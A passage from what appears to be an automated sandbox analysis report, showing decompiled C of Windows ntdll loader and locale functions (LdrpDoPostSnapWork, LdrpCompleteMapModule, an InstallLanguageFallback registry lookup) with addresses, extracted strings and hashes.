						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E037D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E037D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x38b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x38b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E037E2280(_t92, 0x38b86cc);
															_t94 = E03899DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E037F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x38b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E037D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x38b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x38b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0380F380(_t136, 0x37a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E037E2280(_t108, 0x38b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E037F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03899D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E037DFFB0(_t118, _t156, 0x38b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03809A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x037d8799
0x037d879d
0x037d87a1
0x037d87a3
0x037d87a8
0x037d87c3
0x037d87c3
0x037d87c8
0x037d87d1
0x037d87d4
0x037d87d8
0x037d87e5
0x037d87ec
0x03829bfe
0x03829c00
0x03829c02
0x03829c08
0x03829c0d
0x03829c0f
0x03829c14
0x03829c2d
0x03829c32
0x03829c37
0x03829c3a
0x03829c3c
0x03829c42
0x03829c42
0x03829c3c
0x03829c02
0x037d87da
0x037d87df
0x037d87e3
0x00000000
0x00000000
0x037d87e3
0x037d87f2
0x00000000
0x037d87fb
0x037d87fd
0x037d87fe
0x037d880e
0x037d880f
0x037d8810
0x037d8814
0x037d881a
0x037d881c
0x037d881f
0x037d8821
0x037d8822
0x037d8824
0x037d8826
0x037d882c
0x037d882e
0x03829c48
0x03829c48
0x037d8834
0x037d8834
0x037d8837
0x00000000
0x00000000
0x037d8837
0x037d882e
0x037d883d
0x037d8840
0x037d8843
0x037d8846
0x037d8849
0x037d884c
0x037d884e
0x037d8850
0x037d8852
0x037d8854
0x037d8857
0x037d88b4
0x037d88b6
0x037d88b6
0x037d8859
0x037d8859
0x037d8859
0x037d8861
0x037d8866
0x037d886a
0x037d893d
0x037d8941
0x00000000
0x037d8947
0x037d8947
0x037d894a
0x037d894c
0x00000000
0x037d8952
0x037d8955
0x037d895a
0x037d895d
0x037d895d
0x037d895f
0x037d8961
0x037d8961
0x037d8968
0x00000000
0x00000000
0x037d896a
0x037d896b
0x037d896e
0x00000000
0x037d8970
0x037d8970
0x037d8970
0x037d8970
0x037d8972
0x037d8972
0x037d8974
0x00000000
0x037d897a
0x037d897a
0x037d897d
0x00000000
0x037d8983
0x03829c65
0x03829c6d
0x03829c72
0x03829c75
0x03829c75
0x03829c82
0x03829c86
0x03829c87
0x03829c88
0x03829c89
0x03829c8c
0x03829c90
0x03829c95
0x03829c97
0x03829ca0
0x03829ca3
0x03829ca9
0x03829ca9
0x00000000
0x03829ca9
0x03829ca3
0x00000000
0x03829c97
0x037d897d
0x00000000
0x037d8974
0x037d8988
0x037d8992
0x037d8996
0x00000000
0x037d8996
0x037d894c
0x00000000
0x037d8870
0x037d887b
0x037d887d
0x037d887f
0x037d8881
0x037d8884
0x037d8884
0x037d8886
0x037d8889
0x037d888c
0x037d888e
0x037d8891
0x037d8891
0x037d8898
0x00000000
0x00000000
0x037d889a
0x037d889b
0x037d889e
0x00000000
0x00000000
0x037d88a0
0x037d88a8
0x037d88b0
0x037d88b2
0x037d88d3
0x037d88d5
0x00000000
0x037d88d7
0x037d88db
0x037d88dc
0x037d88e0
0x037d88e8
0x037d88ee
0x037d88f0
0x037d88f3
0x037d88fc
0x037d8901
0x037d8906
0x037d890c
0x037d890c
0x037d890f
0x037d8916
0x037d8917
0x037d8918
0x037d8919
0x037d891a
0x037d891f
0x037d8921
0x03829c52
0x03829c55
0x03829c5b
0x03829cac
0x03829cc0
0x03829cc0
0x03829c55
0x037d8927
0x037d8927
0x037d892f
0x037d8933
0x00000000
0x037d88f5
0x037d88f5
0x00000000
0x037d88f7
0x037d88f7
0x037d88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x037d88fa
0x037d88f5
0x037d88f3
0x00000000
0x037d88d5
0x00000000
0x037d88b2
0x037d88c9
0x00000000
0x037d88c9
0x037d887f
0x037d886a
0x037d8857
0x037d8852
0x037d88bf
0x037d88bf
0x037d87aa
0x037d87ad
0x037d87ae
0x037d87b4
0x037d87b5
0x037d87b6
0x037d87b8
0x037d87bd
0x037d87c1
0x037d87f4
0x037d87fa
0x00000000
0x00000000
0x00000000
0x037d87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 03829C28
LdrpDoPostSnapWork, xrefs: 03829C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03829C18

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 7926bb105f830d0c0f53887e754e365b9a57b3b6bfbf4a771364de719cda5ab6
Instruction ID: 31a72ff52e7ba6d659dba45bcbdf64de41a854d9067112eabda074544f9f9e67
Opcode Fuzzy Hash: 7926bb105f830d0c0f53887e754e365b9a57b3b6bfbf4a771364de719cda5ab6
Instruction Fuzzy Hash: F0910671A1031AEFDF18DF98C480ABAB7B9FF45310F0941A9E845AB241E730ED41DB92

Uniqueness

Uniqueness Score: -1.00%

Function 037D7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E037D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E037DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E037CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x38b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03845510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x38b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E037E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E037E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03847016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E037E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E037E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03847016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E037FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E037CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x037d7e4c
0x037d7e50
0x037d7e55
0x037d7e58
0x037d7e5d
0x037d7e71
0x037d7f33
0x037d7e77
0x037d7e77
0x037d7e79
0x037d7e79
0x037d7e7e
0x037d7f45
0x03829848
0x00000000
0x03829848
0x037d7f4e
0x037d7f53
0x037d7f5a
0x00000000
0x00000000
0x0382985a
0x03829862
0x03829866
0x00000000
0x0382986c
0x00000000
0x0382986c
0x037d7e84
0x037d7e84
0x037d7e8d
0x03829871
0x037d7eb8
0x037d7ec0
0x037d7ec0
0x037d7e9a
0x0382987e
0x00000000
0x00000000
0x03829884
0x0382988b
0x038298a7
0x038298ac
0x038298b1
0x038298b6
0x038298b8
0x038298b8
0x038298b9
0x00000000
0x038298b9
0x037d7ea0
0x037d7ea7
0x00000000
0x00000000
0x037d7eac
0x037d7eb1
0x037d7ec6
0x037d7ed0
0x038298cc
0x037d7ed6
0x037d7ed6
0x037d7ed6
0x037d7ede
0x037d7ee3
0x038298e3
0x038298f0
0x03829902
0x038298f2
0x038298fb
0x038298fb
0x03829907
0x0382991d
0x0382991d
0x03829907
0x038298e3
0x037d7ef0
0x037d7f14
0x037d7f14
0x037d7f1e
0x03829946
0x037d7f24
0x037d7f24
0x037d7f24
0x037d7f2c
0x0382996a
0x03829975
0x03829975
0x0382997e
0x03829993
0x03829993
0x0382997e
0x00000000
0x037d7ef2
0x037d7efc
0x037d7f0a
0x037d7f0e
0x03829933
0x00000000
0x03829933
0x00000000
0x037d7f0e
0x00000000
0x00000000
0x00000000
0x037d7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 038298A2
Could not validate the crypto signature for DLL %wZ, xrefs: 03829891
LdrpCompleteMapModule, xrefs: 03829898

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: f89a24b1fe1d95f1eafa1893496e85651c2c24a0f9d8863ba3e9b5dd69874239
Instruction ID: 4636a7936e5f574b6c5f5dfc5d5e4e607b4e9f9d4e9ccac51ddffef0342531a8
Opcode Fuzzy Hash: f89a24b1fe1d95f1eafa1893496e85651c2c24a0f9d8863ba3e9b5dd69874239
Instruction Fuzzy Hash: E151EF35A00785DBDB29CFA8C944B6ABBF4AB45314F0806A9E851DB7E1D730ED40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 037CE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E037CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E037CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E038095D0();
						}
						if(_t78 != 0) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0380FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0380BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03809600();
					if(_t97 < 0) {
						goto L6;
					}
					E0380BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L037CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0380BB40(_t83, _t102 + 0x24, _t78);
								if(L037D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0380BB40(_t84, _t102 + 0x24, _t94);
									if(L037D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x037ce620
0x037ce628
0x037ce62f
0x037ce631
0x037ce635
0x037ce637
0x037ce63e
0x03825503
0x03825503
0x037ce64c
0x037ce64c
0x037ce651
0x00000000
0x00000000
0x037ce661
0x037ce665
0x0382542a
0x037ce715
0x037ce71a
0x037ce71c
0x037ce720
0x037ce720
0x037ce727
0x037ce736
0x037ce736
0x037ce743
0x037ce743
0x037ce673
0x037ce678
0x037ce67d
0x037ce682
0x037ce685
0x037ce692
0x037ce69b
0x037ce6a3
0x037ce6ad
0x037ce6b1
0x037ce6b2
0x037ce6bb
0x037ce6bf
0x037ce6c0
0x037ce6c8
0x037ce6cc
0x037ce6d5
0x037ce6d9
0x00000000
0x00000000
0x037ce6e5
0x037ce6ea
0x037ce6f9
0x037ce70b
0x037ce70f
0x03825439
0x0382545e
0x0382545e
0x00000000
0x0382545e
0x0382543b
0x0382543e
0x03825440
0x03825445
0x03825472
0x03825475
0x0382548d
0x03825493
0x038254a9
0x00000000
0x00000000
0x038254ab
0x038254b4
0x038254bc
0x038254c8
0x038254de
0x038254fb
0x038254e0
0x038254e6
0x038254eb
0x038254eb
0x038254de
0x00000000
0x038254bc
0x03825477
0x0382547a
0x03825480
0x03825483
0x03825486
0x0382548b
0x00000000
0x00000000
0x00000000
0x0382548b
0x00000000
0x00000000
0x00000000
0x00000000
0x03825447
0x03825447
0x03825447
0x03825447
0x0382544e
0x00000000
0x00000000
0x03825450
0x03825452
0x03825455
0x0382545a
0x00000000
0x00000000
0x00000000
0x0382545c
0x0382546a
0x0382546d
0x0382546f
0x00000000
0x0382546f
0x037ce70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 037CE68C
@, xrefs: 037CE6C0
InstallLanguageFallback, xrefs: 037CE6DB

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 6e9a8f68a2b42b613bc5080db7d0a4eb3bb1cd1974a80f3741ae9280d66e2ec5
Instruction ID: 962ef37b186744de43e6bc9ebb9d9a22904dbccc426f3ae500ffaf1b53d81cbd
Opcode Fuzzy Hash: 6e9a8f68a2b42b613bc5080db7d0a4eb3bb1cd1974a80f3741ae9280d66e2ec5
Instruction Fuzzy Hash: 895114B65183559BC710DFA5C840A6BF7E8BF89715F0809AEF985E7240F730DA44C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0388E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0388E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0388BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0388BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0388AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03809730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0388A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0388A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03809730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0388A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0388A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E037E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E037DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E037DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E037E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0387FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0388e547
0x0388e549
0x0388e54f
0x0388e553
0x0388e557
0x0388e55a
0x0388e55c
0x0388e55f
0x0388e561
0x0388e567
0x0388e56b
0x0388e7e2
0x00000000
0x0388e571
0x0388e575
0x0388e577
0x0388e57b
0x0388e57c
0x0388e57d
0x0388e57e
0x0388e57f
0x0388e588
0x0388e58f
0x0388e591
0x0388e592
0x0388e592
0x0388e596
0x0388e59e
0x0388e5a0
0x0388e5a6
0x0388e61d
0x0388e61d
0x0388e621
0x0388e623
0x0388e630
0x0388e630
0x0388e7e6
0x0388e7eb
0x0388e7ed
0x0388e7f4
0x0388e7fa
0x0388e7ff
0x0388e7ff
0x0388e80a
0x0388e812
0x0388e812
0x0388e5ab
0x0388e5b4
0x0388e5b9
0x0388e5be
0x0388e5c0
0x0388e5c2
0x0388e5c8
0x0388e5c9
0x0388e5cb
0x0388e5cc
0x0388e5d5
0x0388e5e4
0x0388e5f1
0x0388e5f8
0x0388e5f8
0x0388e5d5
0x0388e602
0x0388e616
0x0388e63d
0x0388e644
0x0388e64d
0x0388e652
0x0388e657
0x0388e659
0x0388e65b
0x0388e661
0x0388e662
0x0388e664
0x0388e665
0x0388e66e
0x0388e67d
0x0388e68a
0x0388e691
0x0388e691
0x0388e66e
0x0388e6b0
0x00000000
0x0388e6b6
0x0388e6bd
0x0388e6c7
0x0388e6d7
0x0388e6d9
0x0388e6db
0x0388e6de
0x0388e6e3
0x0388e6f3
0x0388e6fc
0x0388e700
0x0388e700
0x0388e704
0x0388e70a
0x0388e70a
0x0388e713
0x0388e716
0x0388e719
0x0388e720
0x0388e761
0x0388e76b
0x0388e774
0x0388e77a
0x0388e77a
0x0388e78a
0x0388e791
0x0388e799
0x0388e79b
0x0388e79f
0x0388e7aa
0x0388e7c0
0x0388e7ac
